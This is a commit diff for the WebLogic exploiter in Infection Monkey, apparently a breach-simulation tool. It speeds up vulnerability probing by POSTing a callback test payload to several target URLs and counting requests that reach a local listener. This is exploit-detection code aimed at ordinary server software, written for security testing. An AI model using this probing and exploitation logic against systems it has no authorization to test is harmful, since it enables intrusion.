Improved the speed of weblogic exploiter

2019-01-24 17:28:44 +02:00 · 2019-01-24 17:28:44 +02:00 · 6073e9f677
parent c38793b527
commit 6073e9f677
1 changed files with 31 additions and 5 deletions
--- a/monkey/infection_monkey/exploit/weblogic.py
+++ b/monkey/infection_monkey/exploit/weblogic.py
@ -13,13 +13,16 @@ from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer

 import threading
 import logging
+import time

 __author__ = "VakarisZ"

 LOG = logging.getLogger(__name__)
 # How long server waits for get request in seconds
 SERVER_TIMEOUT = 4
-# How long to wait for a request to go to vuln machine and then to our server from there. In seconds
+# How long should be wait after each request in seconds
+REQUEST_DELAY = 0.0001
+# How long to wait for a sign(request from host) that server is vulnerable. In seconds
 REQUEST_TIMEOUT = 2
 # How long to wait for response in exploitation. In seconds
 EXECUTION_TIMEOUT = 15
@ -66,18 +69,41 @@ class WebLogicExploiter(WebRCE):
            print(e)
        return True

-    def check_if_exploitable(self, url):
+    def add_vulnerable_urls(self, urls):
+        """
+        Overrides parent method to use listener server
+        """
        # Server might get response faster than it starts listening to it, we need a lock
        httpd, lock = self._start_http_server()
+        exploitable = False
+
+        for url in urls:
+            if self.check_if_exploitable(url, httpd):
+                exploitable = True
+                break
+
+        if not exploitable and httpd.get_requests < 1:
+            # Wait for responses
+            time.sleep(REQUEST_TIMEOUT)
+
+        if httpd.get_requests > 0:
+            # Add all urls because we don't know which one is vulnerable
+            self.vulnerable_urls.extend(urls)
+            self._exploit_info['vulnerable_urls'] = self.vulnerable_urls
+        else:
+            LOG.info("No vulnerable urls found, skipping.")
+
+        self._stop_http_server(httpd, lock)
+
+    def check_if_exploitable(self, url, httpd):
        payload = self.get_test_payload(ip=httpd._local_ip, port=httpd._local_port)
        try:
-            post(url, data=payload, headers=HEADERS, timeout=REQUEST_TIMEOUT, verify=False)
+            post(url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False)
        except exceptions.ReadTimeout:
-            # Our request does not get response thus we get ReadTimeout error
+            # Our request will not get response thus we get ReadTimeout error
            pass
        except Exception as e:
            LOG.error("Something went wrong: %s" % e)
-        self._stop_http_server(httpd, lock)
        return httpd.get_requests > 0

    def _start_http_server(self):